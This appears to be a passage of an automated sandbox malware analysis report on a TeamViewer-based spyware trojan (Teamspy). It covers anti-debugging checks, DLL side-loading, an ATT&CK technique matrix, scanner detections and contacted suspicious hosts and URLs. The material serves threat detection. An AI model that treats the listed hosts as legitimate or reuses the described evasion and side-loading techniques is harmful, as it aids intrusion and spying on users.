Source: svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.747809798.00000282E4429000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000003.412988843.0000000000B1C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWSysWOW64\FirewallControlPanel.dll,-12122!3
Source: svchost.exe, 0000000E.00000002.490833749.000001C4950A9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeOpen window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_6F33B0A0
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405E88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33B510 GetProcessHeap,HeapFree,HeapFree,HeapDestroy,2_2_6F33B510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6F33C1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F33C1E2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6F33C1E2

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335130 LogonUserW,GetLastError,CloseHandle,2_2_6F335130
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,2_2_6F333390
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmpBinary or memory string: user841675usProgram ManagerC:\Windows\explorer.exe3910722678072
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_xtoa_s@20,3_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,3_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,3_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,3_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,3_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,6_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0054B459
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,762AA680,lstrcat,lstrlen,1_2_00405B88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,2_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,3_2_00511D6F

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation11DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default Accounts | Native API 1 | DLL Search Order Hijacking 2 | DLL Search Order Hijacking 2 | Obfuscated Files or Information 2 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Service Execution 12 | Create Account 1 | Valid Accounts 2 | Software Packing 1 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Valid Accounts 2 | Access Token Manipulation 21 | DLL Side-Loading 1 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Windows Service 22 | Windows Service 22 | DLL Search Order Hijacking 2 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Registry Run Keys / Startup Folder 1 | Process Injection 12 | Masquerading 12 | Cached Domain Credentials | Security Software Discovery 451 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder 1 | Valid Accounts 2 | DCSync | Virtualization/Sandbox Evasion 22 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 22 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 21 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 12 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Network Configuration Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
77Etc0bR2v.exe | 38% | Virustotal | | Browse
77Etc0bR2v.exe | 11% | Metadefender | | Browse
77Etc0bR2v.exe | 38% | ReversingLabs | Win32.Trojan.Teamspy |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll | 27% | ReversingLabs | Win32.Trojan.SpywareX |
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | 0% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll | 0% | Metadefender | | Browse
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll | 0% | ReversingLabs | |

Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
1.2.77Etc0bR2v.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2 | | Download File
1.0.77Etc0bR2v.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
outnegorave.info | 172.67.205.33 | true | false | | high
master1.teamviewer.com | 185.188.32.1 | true | false | | high
ping3.dyngate.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                  http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.teamviewer.com/licensing/commercialuse.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                    high
                                                                                                    http://nsis.sf.net/NSIS_Error77Etc0bR2v.exefalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://outnegorave.info/B8C631A8/87096&p=10000001TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTTeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://outnegorave.info/B8C631A8/sTeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.roblox.com/info/privacysvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://www.g5e.com/termsofservicesvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.teamviewer.com/company/index.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                              high
                                                                                                              http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                high
                                                                                                                http://www.teamviewer.com/ja/company/shutdown.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                  high
                                                                                                                  https://outnegorave.info/B8C631A8/xTeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateYTeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001lTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://37.252.232.109/32172969&client=DynGate&p=10000002vTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://www.teamviewer.com/ja/licensing/commercialuse.aspxTeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.teamviewer.com/licensing/order.aspx?lng=ja77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                      high

                                                                                                                      Contacted IPs


                                                                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.188.32.1 | master1.teamviewer.com | Germany | 43304 | TEAMVIEWER-ASDE | false
172.67.205.33 | outnegorave.info | United States | 13335 | CLOUDFLARENETUS | false
37.252.232.109 | unknown | Austria | 42473 | AS-ANEXIAANEXIAInternetdienstleistungsGmbHAT | false

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                      Analysis ID:483795
                                                                                                                      Start date:15.09.2021
                                                                                                                      Start time:14:06:31
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 14m 57s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Sample file name:77Etc0bR2v.exe
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                      Number of analysed new started processes analysed:25
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal76.evad.winEXE@14/11@4/4
                                                                                                                      EGA Information:Failed
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 36.4% (good quality ratio 35.4%)
                                                                                                                      • Quality average: 85.3%
                                                                                                                      • Quality standard deviation: 22.8%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Adjust boot time
                                                                                                                      • Enable AMSI
                                                                                                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      Warnings:
